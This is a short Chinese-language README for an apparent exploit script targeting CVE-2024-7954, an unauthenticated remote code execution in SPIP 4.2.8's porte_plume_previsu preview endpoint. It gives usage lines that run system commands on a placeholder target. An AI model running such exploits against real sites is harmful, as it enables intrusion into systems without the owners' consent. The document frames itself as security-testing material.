此脚本通过 porte_plume_previsu 端点利用 SPIP 4.2.8 版本中的远程代码执行漏洞。该漏洞允许未认证的攻击者通过预览渲染特制的图片标签来注入 PHP 代码。
CVE 编号: CVE-2024-7954
组件: SPIP CMS (porte_plume_previsu)
影响: 未认证的远程命令执行
严重程度: 严重
python3 cve_2024_7954_rce.py --url <TARGET_URL> --cmd <COMMAND> [--proxy <IP:PORT>]
python3 cve_2024_7954_rce.py --url <TARGET_URL> --cmd "whoami" --proxy "127.0.0.1:8080"


python3 cve_2024_7954_rce.py --url <TARGET_URL> --cmd "id" --proxy "127.0.0.1:8080"


python3 cve_2024_7954_rce.py --url <TARGET_URL> --cmd "uname -a" --proxy "127.0.0.1:8080"


此漏洞利用脚本仅用于授权安全测试、防御性研究和教育目的。